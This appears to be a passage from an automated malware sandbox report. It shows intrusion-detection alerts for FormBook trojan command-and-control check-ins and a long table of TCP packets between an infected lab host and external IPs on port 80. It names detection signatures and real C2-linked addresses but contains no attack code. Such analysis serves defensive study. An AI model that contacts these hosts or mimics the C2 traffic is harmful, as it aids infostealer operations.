                                    11/25/21-19:30:53.961180TCP2031449ET TROJAN FormBook CnC Checkin (GET)4916780192.168.2.2252.128.23.153
                                    11/25/21-19:30:53.961180TCP2031412ET TROJAN FormBook CnC Checkin (GET)4916780192.168.2.2252.128.23.153

                                    Network Port Distribution

                                    TCP Packets

                                    TimestampSource PortDest PortSource IPDest IP
                                    Nov 25, 2021 19:29:20.721256971 CET4916580192.168.2.22202.55.132.154
                                    Nov 25, 2021 19:29:20.958647966 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:20.958758116 CET4916580192.168.2.22202.55.132.154
                                    Nov 25, 2021 19:29:20.959091902 CET4916580192.168.2.22202.55.132.154
                                    Nov 25, 2021 19:29:21.195264101 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:21.195287943 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:21.195300102 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:21.195312023 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:21.195483923 CET4916580192.168.2.22202.55.132.154
                                    Nov 25, 2021 19:29:21.430346966 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:21.430375099 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:21.430387974 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:21.430401087 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:21.430416107 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:21.430432081 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:21.430449009 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:21.430464983 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:21.430645943 CET4916580192.168.2.22202.55.132.154
                                    Nov 25, 2021 19:29:21.664612055 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:21.664652109 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:21.664664984 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:21.664683104 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:21.664700031 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:21.664716005 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:21.664732933 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:21.664750099 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:21.664767027 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:21.664783955 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:21.664798975 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:21.664814949 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:21.664864063 CET4916580192.168.2.22202.55.132.154
                                    Nov 25, 2021 19:29:21.664897919 CET4916580192.168.2.22202.55.132.154
                                    Nov 25, 2021 19:29:21.664901018 CET4916580192.168.2.22202.55.132.154
                                    Nov 25, 2021 19:29:21.664905071 CET4916580192.168.2.22202.55.132.154
                                    Nov 25, 2021 19:29:21.664906979 CET4916580192.168.2.22202.55.132.154
                                    Nov 25, 2021 19:29:21.664910078 CET4916580192.168.2.22202.55.132.154
                                    Nov 25, 2021 19:29:21.667606115 CET4916580192.168.2.22202.55.132.154
                                    Nov 25, 2021 19:29:21.898916960 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:21.898942947 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:21.898955107 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:21.898967028 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:21.898979902 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:21.899003983 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:21.899020910 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:21.899038076 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:21.899054050 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:21.899070024 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:21.899081945 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:21.899099112 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:21.899096966 CET4916580192.168.2.22202.55.132.154
                                    Nov 25, 2021 19:29:21.899116039 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:21.899122000 CET4916580192.168.2.22202.55.132.154
                                    Nov 25, 2021 19:29:21.899128914 CET4916580192.168.2.22202.55.132.154
                                    Nov 25, 2021 19:29:21.899132967 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:21.899136066 CET4916580192.168.2.22202.55.132.154
                                    Nov 25, 2021 19:29:21.899149895 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:21.899152994 CET4916580192.168.2.22202.55.132.154
                                    Nov 25, 2021 19:29:21.899168015 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:21.899169922 CET4916580192.168.2.22202.55.132.154
                                    Nov 25, 2021 19:29:21.899184942 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:21.899187088 CET4916580192.168.2.22202.55.132.154
                                    Nov 25, 2021 19:29:21.899200916 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:21.899202108 CET4916580192.168.2.22202.55.132.154
                                    Nov 25, 2021 19:29:21.899218082 CET4916580192.168.2.22202.55.132.154
                                    Nov 25, 2021 19:29:21.899218082 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:21.899231911 CET4916580192.168.2.22202.55.132.154
                                    Nov 25, 2021 19:29:21.899235010 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:21.899249077 CET4916580192.168.2.22202.55.132.154
                                    Nov 25, 2021 19:29:21.899251938 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:21.899264097 CET4916580192.168.2.22202.55.132.154
                                    Nov 25, 2021 19:29:21.899269104 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:21.899280071 CET4916580192.168.2.22202.55.132.154
                                    Nov 25, 2021 19:29:21.899286032 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:21.899295092 CET4916580192.168.2.22202.55.132.154
                                    Nov 25, 2021 19:29:21.899316072 CET4916580192.168.2.22202.55.132.154
                                    Nov 25, 2021 19:29:21.901333094 CET4916580192.168.2.22202.55.132.154
                                    Nov 25, 2021 19:29:21.907150030 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:21.907253981 CET4916580192.168.2.22202.55.132.154
                                    Nov 25, 2021 19:29:22.134200096 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:22.134234905 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:22.134258032 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:22.134280920 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:22.134322882 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:22.134327888 CET4916580192.168.2.22202.55.132.154
                                    Nov 25, 2021 19:29:22.134349108 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:22.134368896 CET4916580192.168.2.22202.55.132.154
                                    Nov 25, 2021 19:29:22.134372950 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:22.134377003 CET4916580192.168.2.22202.55.132.154
                                    Nov 25, 2021 19:29:22.134397030 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:22.134421110 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:22.134424925 CET4916580192.168.2.22202.55.132.154
                                    Nov 25, 2021 19:29:22.134438038 CET4916580192.168.2.22202.55.132.154
                                    Nov 25, 2021 19:29:22.134457111 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:22.134476900 CET4916580192.168.2.22202.55.132.154
                                    Nov 25, 2021 19:29:22.134478092 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:22.134500980 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:22.134512901 CET4916580192.168.2.22202.55.132.154
                                    Nov 25, 2021 19:29:22.134524107 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:22.134531975 CET4916580192.168.2.22202.55.132.154
                                    Nov 25, 2021 19:29:22.134546995 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:22.134571075 CET4916580192.168.2.22202.55.132.154
                                    Nov 25, 2021 19:29:22.134584904 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:22.134602070 CET4916580192.168.2.22202.55.132.154
                                    Nov 25, 2021 19:29:22.134608030 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:22.134629011 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:22.134634018 CET4916580192.168.2.22202.55.132.154
                                    Nov 25, 2021 19:29:22.134656906 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:22.134669065 CET4916580192.168.2.22202.55.132.154
                                    Nov 25, 2021 19:29:22.134687901 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:22.134702921 CET4916580192.168.2.22202.55.132.154
                                    Nov 25, 2021 19:29:22.134711027 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:22.134727001 CET4916580192.168.2.22202.55.132.154
                                    Nov 25, 2021 19:29:22.134735107 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:22.134758949 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:22.134771109 CET4916580192.168.2.22202.55.132.154
                                    Nov 25, 2021 19:29:22.134783983 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:22.134787083 CET4916580192.168.2.22202.55.132.154
                                    Nov 25, 2021 19:29:22.134810925 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:22.134824038 CET4916580192.168.2.22202.55.132.154
                                    Nov 25, 2021 19:29:22.134845018 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:22.134848118 CET4916580192.168.2.22202.55.132.154
                                    Nov 25, 2021 19:29:22.134867907 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:22.134884119 CET4916580192.168.2.22202.55.132.154
                                    Nov 25, 2021 19:29:22.134893894 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:22.134905100 CET4916580192.168.2.22202.55.132.154
                                    Nov 25, 2021 19:29:22.134922028 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:22.134941101 CET4916580192.168.2.22202.55.132.154
                                    Nov 25, 2021 19:29:22.134953022 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:22.134973049 CET4916580192.168.2.22202.55.132.154
                                    Nov 25, 2021 19:29:22.134990931 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:22.135004997 CET4916580192.168.2.22202.55.132.154
                                    Nov 25, 2021 19:29:22.135015965 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:22.135040045 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:22.135119915 CET4916580192.168.2.22202.55.132.154
                                    Nov 25, 2021 19:29:22.135206938 CET4916580192.168.2.22202.55.132.154
                                    Nov 25, 2021 19:29:22.135222912 CET4916580192.168.2.22202.55.132.154
                                    Nov 25, 2021 19:29:22.138659954 CET4916580192.168.2.22202.55.132.154
                                    Nov 25, 2021 19:29:22.141448975 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:22.141479969 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:22.141499043 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:22.141521931 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:22.141546011 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:22.141571999 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:22.141597033 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:22.141623020 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:22.141648054 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:22.141628981 CET4916580192.168.2.22202.55.132.154
                                    Nov 25, 2021 19:29:22.141671896 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:22.141695023 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:22.141697884 CET4916580192.168.2.22202.55.132.154
                                    Nov 25, 2021 19:29:22.141719103 CET4916580192.168.2.22202.55.132.154
                                    Nov 25, 2021 19:29:22.141719103 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:22.141721964 CET4916580192.168.2.22202.55.132.154
                                    Nov 25, 2021 19:29:22.141741991 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:22.141742945 CET4916580192.168.2.22202.55.132.154
                                    Nov 25, 2021 19:29:22.141746044 CET4916580192.168.2.22202.55.132.154
                                    Nov 25, 2021 19:29:22.141766071 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:22.141768932 CET4916580192.168.2.22202.55.132.154
                                    Nov 25, 2021 19:29:22.141803026 CET4916580192.168.2.22202.55.132.154
                                    Nov 25, 2021 19:29:22.141844034 CET4916580192.168.2.22202.55.132.154
                                    Nov 25, 2021 19:29:22.147500992 CET4916580192.168.2.22202.55.132.154
                                    Nov 25, 2021 19:29:22.369494915 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:22.369524956 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:22.369546890 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:22.369570017 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:22.369591951 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:22.369615078 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:22.369622946 CET4916580192.168.2.22202.55.132.154
                                    Nov 25, 2021 19:29:22.369640112 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:22.369647026 CET4916580192.168.2.22202.55.132.154
                                    Nov 25, 2021 19:29:22.369649887 CET4916580192.168.2.22202.55.132.154
                                    Nov 25, 2021 19:29:22.369656086 CET4916580192.168.2.22202.55.132.154
                                    Nov 25, 2021 19:29:22.369663954 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:22.369684935 CET4916580192.168.2.22202.55.132.154
                                    Nov 25, 2021 19:29:22.369689941 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:22.369704962 CET4916580192.168.2.22202.55.132.154
                                    Nov 25, 2021 19:29:22.369714975 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:22.369724989 CET4916580192.168.2.22202.55.132.154
                                    Nov 25, 2021 19:29:22.369756937 CET4916580192.168.2.22202.55.132.154
                                    Nov 25, 2021 19:29:22.372380018 CET4916580192.168.2.22202.55.132.154
                                    Nov 25, 2021 19:29:22.372941971 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:22.372970104 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:22.372989893 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:22.373014927 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:22.373039007 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:22.373063087 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:22.373076916 CET4916580192.168.2.22202.55.132.154
                                    Nov 25, 2021 19:29:22.373090029 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:22.373102903 CET4916580192.168.2.22202.55.132.154
                                    Nov 25, 2021 19:29:22.373114109 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:22.373123884 CET4916580192.168.2.22202.55.132.154
                                    Nov 25, 2021 19:29:22.373137951 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:22.373147011 CET4916580192.168.2.22202.55.132.154
                                    Nov 25, 2021 19:29:22.373162985 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:22.373166084 CET4916580192.168.2.22202.55.132.154
                                    Nov 25, 2021 19:29:22.373187065 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:22.373188972 CET4916580192.168.2.22202.55.132.154
                                    Nov 25, 2021 19:29:22.373212099 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:22.373214006 CET4916580192.168.2.22202.55.132.154
                                    Nov 25, 2021 19:29:22.373236895 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:22.373248100 CET4916580192.168.2.22202.55.132.154
                                    Nov 25, 2021 19:29:22.373261929 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:22.373286963 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:22.373290062 CET4916580192.168.2.22202.55.132.154
                                    Nov 25, 2021 19:29:22.373311043 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:22.373311996 CET4916580192.168.2.22202.55.132.154
                                    Nov 25, 2021 19:29:22.373337030 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:22.373337984 CET4916580192.168.2.22202.55.132.154
                                    Nov 25, 2021 19:29:22.373361111 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:22.373363972 CET4916580192.168.2.22202.55.132.154
                                    Nov 25, 2021 19:29:22.373384953 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:22.373389006 CET4916580192.168.2.22202.55.132.154
                                    Nov 25, 2021 19:29:22.373409033 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:22.373409986 CET4916580192.168.2.22202.55.132.154
                                    Nov 25, 2021 19:29:22.373433113 CET4916580192.168.2.22202.55.132.154
                                    Nov 25, 2021 19:29:22.373434067 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:22.373460054 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:22.373461008 CET4916580192.168.2.22202.55.132.154
                                    Nov 25, 2021 19:29:22.373483896 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:22.373485088 CET4916580192.168.2.22202.55.132.154
                                    Nov 25, 2021 19:29:22.373507977 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:22.373508930 CET4916580192.168.2.22202.55.132.154
                                    Nov 25, 2021 19:29:22.373534918 CET4916580192.168.2.22202.55.132.154
                                    Nov 25, 2021 19:29:22.373555899 CET4916580192.168.2.22202.55.132.154
                                    Nov 25, 2021 19:29:22.375158072 CET4916580192.168.2.22202.55.132.154
                                    Nov 25, 2021 19:29:22.382185936 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:22.382219076 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:22.382236958 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:22.382260084 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:22.382282972 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:22.382307053 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:22.382329941 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:22.382355928 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:22.382380009 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:22.382400990 CET4916580192.168.2.22202.55.132.154
                                    Nov 25, 2021 19:29:22.382404089 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:22.382422924 CET4916580192.168.2.22202.55.132.154
                                    Nov 25, 2021 19:29:22.382427931 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:22.382452011 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:22.382477045 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:22.382499933 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:22.382520914 CET4916580192.168.2.22202.55.132.154
                                    Nov 25, 2021 19:29:22.382550001 CET4916580192.168.2.22202.55.132.154
                                    Nov 25, 2021 19:29:22.382628918 CET4916580192.168.2.22202.55.132.154
                                    Nov 25, 2021 19:29:22.604330063 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:22.604374886 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:22.604398966 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:22.604423046 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:22.604446888 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:22.604470015 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:22.604491949 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:22.604516983 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:22.604623079 CET4916580192.168.2.22202.55.132.154
                                    Nov 25, 2021 19:29:22.604660034 CET4916580192.168.2.22202.55.132.154
                                    Nov 25, 2021 19:29:22.606492043 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:22.606519938 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:22.606630087 CET4916580192.168.2.22202.55.132.154
                                    Nov 25, 2021 19:29:22.607441902 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:22.607465982 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:22.607479095 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:22.607496023 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:22.607563019 CET4916580192.168.2.22202.55.132.154
                                    Nov 25, 2021 19:29:22.608231068 CET4916580192.168.2.22202.55.132.154
                                    Nov 25, 2021 19:29:22.609179020 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:22.609209061 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:22.609229088 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:22.609250069 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:22.609255075 CET4916580192.168.2.22202.55.132.154
                                    Nov 25, 2021 19:29:22.609271049 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:22.609282017 CET4916580192.168.2.22202.55.132.154
                                    Nov 25, 2021 19:29:22.609288931 CET4916580192.168.2.22202.55.132.154
                                    Nov 25, 2021 19:29:22.609293938 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:22.609298944 CET4916580192.168.2.22202.55.132.154
                                    Nov 25, 2021 19:29:22.609317064 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:22.609323025 CET4916580192.168.2.22202.55.132.154
                                    Nov 25, 2021 19:29:22.609338999 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:22.609354019 CET4916580192.168.2.22202.55.132.154
                                    Nov 25, 2021 19:29:22.609360933 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:22.609360933 CET4916580192.168.2.22202.55.132.154
                                    Nov 25, 2021 19:29:22.609380960 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:22.609390020 CET4916580192.168.2.22202.55.132.154
                                    Nov 25, 2021 19:29:22.609400034 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:22.609404087 CET4916580192.168.2.22202.55.132.154
                                    Nov 25, 2021 19:29:22.609421015 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:22.609428883 CET4916580192.168.2.22202.55.132.154
                                    Nov 25, 2021 19:29:22.609441042 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:22.609455109 CET4916580192.168.2.22202.55.132.154
                                    Nov 25, 2021 19:29:22.609461069 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:22.609462976 CET4916580192.168.2.22202.55.132.154
                                    Nov 25, 2021 19:29:22.609482050 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:22.609491110 CET4916580192.168.2.22202.55.132.154
                                    Nov 25, 2021 19:29:22.609503984 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:22.609503984 CET4916580192.168.2.22202.55.132.154
                                    Nov 25, 2021 19:29:22.609524965 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:22.609529972 CET4916580192.168.2.22202.55.132.154
                                    Nov 25, 2021 19:29:22.609546900 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:22.609549999 CET4916580192.168.2.22202.55.132.154
                                    Nov 25, 2021 19:29:22.609565973 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:22.609571934 CET4916580192.168.2.22202.55.132.154
                                    Nov 25, 2021 19:29:22.609587908 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:22.609596014 CET4916580192.168.2.22202.55.132.154
                                    Nov 25, 2021 19:29:22.609613895 CET4916580192.168.2.22202.55.132.154
                                    Nov 25, 2021 19:29:22.609633923 CET4916580192.168.2.22202.55.132.154
                                    Nov 25, 2021 19:29:22.611207962 CET4916580192.168.2.22202.55.132.154
                                    Nov 25, 2021 19:29:22.616519928 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:22.616554022 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:22.616573095 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:22.616595030 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:22.616614103 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:22.616631031 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:22.616652012 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:22.616657972 CET4916580192.168.2.22202.55.132.154
                                    Nov 25, 2021 19:29:22.616668940 CET4916580192.168.2.22202.55.132.154
                                    Nov 25, 2021 19:29:22.616672993 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:22.616693020 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:22.616709948 CET4916580192.168.2.22202.55.132.154
                                    Nov 25, 2021 19:29:22.616714001 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:22.616734028 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:22.616748095 CET4916580192.168.2.22202.55.132.154
                                    Nov 25, 2021 19:29:22.616753101 CET4916580192.168.2.22202.55.132.154
                                    Nov 25, 2021 19:29:22.616755962 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:22.616769075 CET4916580192.168.2.22202.55.132.154
                                    Nov 25, 2021 19:29:22.616775036 CET4916580192.168.2.22202.55.132.154
                                    Nov 25, 2021 19:29:22.616779089 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:22.616800070 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:22.616802931 CET4916580192.168.2.22202.55.132.154
                                    Nov 25, 2021 19:29:22.616827011 CET4916580192.168.2.22202.55.132.154
                                    Nov 25, 2021 19:29:22.616844893 CET4916580192.168.2.22202.55.132.154
                                    Nov 25, 2021 19:29:22.618696928 CET4916580192.168.2.22202.55.132.154
                                    Nov 25, 2021 19:29:22.838660955 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:22.838701010 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:22.838718891 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:22.838741064 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:22.838762999 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:22.838784933 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:22.838809013 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:22.838834047 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:22.838954926 CET4916580192.168.2.22202.55.132.154
                                    Nov 25, 2021 19:29:22.839570999 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:22.839601040 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:22.839626074 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:22.839627981 CET4916580192.168.2.22202.55.132.154
                                    Nov 25, 2021 19:29:22.839651108 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:22.839662075 CET4916580192.168.2.22202.55.132.154
